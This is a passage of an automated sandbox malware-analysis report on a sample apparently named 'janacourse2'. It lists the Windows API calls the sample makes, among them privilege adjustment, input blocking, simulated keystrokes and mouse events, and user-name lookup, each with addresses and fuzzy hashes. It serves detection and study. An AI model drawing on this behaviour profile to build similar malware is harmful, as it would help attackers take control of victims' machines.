                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 33631002-0
                                                                                                            • Opcode ID: 1aa9634148c7c479825d483d9c85ba6f73a0733b66ab23008dc67b78f3011171
                                                                                                            • Instruction ID: 25adda8ae497e67ec2e4928290c3d9c53c4b70ec750698f318fa4540bb530ae2
                                                                                                            • Opcode Fuzzy Hash: 1aa9634148c7c479825d483d9c85ba6f73a0733b66ab23008dc67b78f3011171
                                                                                                            • Instruction Fuzzy Hash: 0D11A5B5E01228BFEB208F98DD48FAFBFBCEB49B50F104151F904E7284C2745A018BA1
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0101168C
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 010116A1
                                                                                                            • FreeSid.ADVAPI32(?), ref: 010116B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: 649478a36e4aaf523900ecf54748ffd342b82e48950f9940c035adf34c883927
                                                                                                            • Instruction ID: b0faec7228f12f0484c3ec79d49745ca66106dca07cbc4d0d1802485f5e4d5c4
                                                                                                            • Opcode Fuzzy Hash: 649478a36e4aaf523900ecf54748ffd342b82e48950f9940c035adf34c883927
                                                                                                            • Instruction Fuzzy Hash: C8F06D7594130CBBEF00CFE4CA89EAEBBBCFB08200F004860F500E2180D335AA048B50
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000,?,00FE28E9), ref: 00FD4D09
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000,?,00FE28E9), ref: 00FD4D10
                                                                                                            • ExitProcess.KERNEL32 ref: 00FD4D22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: f691986d55b6cec82ea160ccf03058a3f0f835667d2d1bd8010292e9d01e3f6d
                                                                                                            • Instruction ID: 3d989a3454ff7be35789f0a0da5303f7ee374aa34a756082bf43ad076c5dd96c
                                                                                                            • Opcode Fuzzy Hash: f691986d55b6cec82ea160ccf03058a3f0f835667d2d1bd8010292e9d01e3f6d
                                                                                                            • Instruction Fuzzy Hash: 99E0BF75401148ABDF216F54DF49A583B6BEB41752B184015FC458B226CB3AEE41DF40
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0100D28C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID: X64
                                                                                                            • API String ID: 2645101109-893830106
                                                                                                            • Opcode ID: 7731a3ba950923721242b8eb4d7f405427b360f9639760b31bc6fcb86185c3d3
                                                                                                            • Instruction ID: f0dd8843a02c8b805f4e0db9ebd637f4b98bb49a1bacb47f41cbfb9c01a90267
                                                                                                            • Opcode Fuzzy Hash: 7731a3ba950923721242b8eb4d7f405427b360f9639760b31bc6fcb86185c3d3
                                                                                                            • Instruction Fuzzy Hash: A4D0C9B580211DEBDB90CA90D9C8EDDB37CBB14315F000155F146A2040D73495488F20
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction ID: 0ec09bfbf72540a9a835a91fdbcc500dca4054007af314270c8d849a4306da2f
                                                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction Fuzzy Hash: F1021E71E0011A9BDF14CFA9C9806ADFBF2FF48324F29426AD919E7384D731A941DB94
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 01026918
                                                                                                            • FindClose.KERNEL32(00000000), ref: 01026961
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 40a7716a254376e3936945a83ce23cc503ea04fe5927219d6bd2df71e65a0e8c
                                                                                                            • Instruction ID: 8ac45eb550a19c07d12bb6cb7a2ca200bbb13d6b0dccc26fc99f7487b9113a2e
                                                                                                            • Opcode Fuzzy Hash: 40a7716a254376e3936945a83ce23cc503ea04fe5927219d6bd2df71e65a0e8c
                                                                                                            • Instruction Fuzzy Hash: 4F11D3756042109FD710DF2AC484A56BBE4FF85328F04C699F9A98F2A2CB35EC05CB90
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01034891,?,?,00000035,?), ref: 010237E4
                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01034891,?,?,00000035,?), ref: 010237F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: 856f33f9238aa253a15c7f904ce47533bca391007964fd58b389954c8bd2f67b
                                                                                                            • Instruction ID: c4a1cf5b9420bf9a918e24786cd695d1065fddfbeb122f205aab211972864b81
                                                                                                            • Opcode Fuzzy Hash: 856f33f9238aa253a15c7f904ce47533bca391007964fd58b389954c8bd2f67b
                                                                                                            • Instruction Fuzzy Hash: 47F0ECB46052296BEB3016664D4DFEB3A9DFFC4761F000165F509D2185D5645904C7B0
                                                                                                            APIs
                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0101B25D
                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0101B270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InputSendkeybd_event
                                                                                                            • String ID:
                                                                                                            • API String ID: 3536248340-0
                                                                                                            • Opcode ID: dae189ebb16458f75a4f2225401deae46132971060294723a1e3d19c5de79267
                                                                                                            • Instruction ID: 55a05f3a71d5ecbbf4bb9aa5805449efb8ca92322e46e6b44d37b649ea165e0e
                                                                                                            • Opcode Fuzzy Hash: dae189ebb16458f75a4f2225401deae46132971060294723a1e3d19c5de79267
                                                                                                            • Instruction Fuzzy Hash: 56F06D7480424DABEB158FA0C805BEE7FB0FF04305F008009F991A5195C37D82058F94
                                                                                                            APIs
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010111FC), ref: 010110D4
                                                                                                            • CloseHandle.KERNEL32(?,?,010111FC), ref: 010110E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 81990902-0
                                                                                                            • Opcode ID: ee15002cf0ccf1a4f0048570e845a31ad9c46faa328aaa69ffa562cae7131913
                                                                                                            • Instruction ID: 01fa13f55269a1594a00b28faeed41018438937d756e13779c0d37ea07b08d75
                                                                                                            • Opcode Fuzzy Hash: ee15002cf0ccf1a4f0048570e845a31ad9c46faa328aaa69ffa562cae7131913
                                                                                                            • Instruction Fuzzy Hash: 52E04F72005611AFF7352B21FE06F73BBE9EB04310B10882DF5A6804B5DB666C90EB10
                                                                                                            Strings
                                                                                                            • Variable is not of type 'Object'., xrefs: 01000C40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Variable is not of type 'Object'.
                                                                                                            • API String ID: 0-1840281001
                                                                                                            • Opcode ID: 78ba656690ffbf28b1a29a459de4e0ae70b1b6b8198034c8e13a4c07c2a52834
                                                                                                            • Instruction ID: 4e0cd668a339c98a4cf83ffebccfbb2c18efa8f522dc1b0f9279c97dde1748cd
                                                                                                            • Opcode Fuzzy Hash: 78ba656690ffbf28b1a29a459de4e0ae70b1b6b8198034c8e13a4c07c2a52834
                                                                                                            • Instruction Fuzzy Hash: BE32BF74900208DBDF15DF95C881BFEBBB5BF04344F1080A9E846AB286CB75AD45EFA0
                                                                                                            APIs
                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FE6766,?,?,00000008,?,?,00FEFEFE,00000000), ref: 00FE6998
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID:
                                                                                                            • API String ID: 3997070919-0
                                                                                                            • Opcode ID: 1184fe288ff2e6785ed18563fe0dae6b52c7545844f449d0520eafadcd9d03ad
                                                                                                            • Instruction ID: eae6ccfec06b48326eb75b1f31153e7824eebca2cf1b2b88d8a77087b52af0ad
                                                                                                            • Opcode Fuzzy Hash: 1184fe288ff2e6785ed18563fe0dae6b52c7545844f449d0520eafadcd9d03ad
                                                                                                            • Instruction Fuzzy Hash: F0B17D32A10648CFD715CF29C48AB647BE0FF153A4F258658E8D9CF2A2C335EA81DB40
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID: 0-3916222277
                                                                                                            • Opcode ID: e71effcd8ba3a6a3f436c07dc32c8579ac99806d616c431d43f7a95ab4097c91
                                                                                                            • Instruction ID: 6bc4af39848ff12b81c46f21bd9cc5dede982e8ef4ee20e87b73372b62f28ae7
                                                                                                            • Opcode Fuzzy Hash: e71effcd8ba3a6a3f436c07dc32c8579ac99806d616c431d43f7a95ab4097c91
                                                                                                            • Instruction Fuzzy Hash: 27128E75D0022ADBDB15CF58C981BEEB7F5FF48310F1081AAE849EB295D7349A81DB90
                                                                                                            APIs
                                                                                                            • BlockInput.USER32(00000001), ref: 0102EABD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BlockInput
                                                                                                            • String ID:
                                                                                                            • API String ID: 3456056419-0
                                                                                                            • Opcode ID: 31dc09bb97396c2d21b6a6881b4cd506713f229b9efd343011509277378b20ea
                                                                                                            • Instruction ID: 82979a56aefc2179cce6dde32deba2460c98714eda9790722853cbcbb960c44b
                                                                                                            • Opcode Fuzzy Hash: 31dc09bb97396c2d21b6a6881b4cd506713f229b9efd343011509277378b20ea
                                                                                                            • Instruction Fuzzy Hash: D3E04F352002149FD710EF5AD844E9AF7EDAF98764F00845AFC8AC7351DBB4F8408BA1
                                                                                                            APIs
                                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0101E37E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: mouse_event
                                                                                                            • String ID:
                                                                                                            • API String ID: 2434400541-0
                                                                                                            • Opcode ID: 27eb5ba48e83bb9c2a83add63fac3213c06026b2115b4995709e6a21abf316e2
                                                                                                            • Instruction ID: 76cf4470b07f809d6ca9cc0efc76cdf218603079584217e542a97fe3fd53baa5
                                                                                                            • Opcode Fuzzy Hash: 27eb5ba48e83bb9c2a83add63fac3213c06026b2115b4995709e6a21abf316e2
                                                                                                            • Instruction Fuzzy Hash: 60D05BF69502013DF67F093CCA3FF7E3948E301540F40D789B9C18558DD58D95445011
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00FD03EE), ref: 00FD09DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: e30b468dcd370fb597ce4eb0c9c979bb3df543af61a6ac2bee5615c2933c59bc
                                                                                                            • Instruction ID: 29bc029ac08ff65445c1443ec37554059e21f33ccab96ce3ad1c12cf16d18755
                                                                                                            • Opcode Fuzzy Hash: e30b468dcd370fb597ce4eb0c9c979bb3df543af61a6ac2bee5615c2933c59bc
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 0-4108050209
                                                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction ID: 0bcec54859ad7e679b65416c172dfa5ec6e14ed46baba19462af35d8c1db25fc
                                                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction Fuzzy Hash: BB512572E0C7455ADB387568886A7BE73979B02360F2C050BD886DF382F619DE06F356
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d58340813ae995f8a32acd47bbeb83919726482b623e3881532716577c3c5885
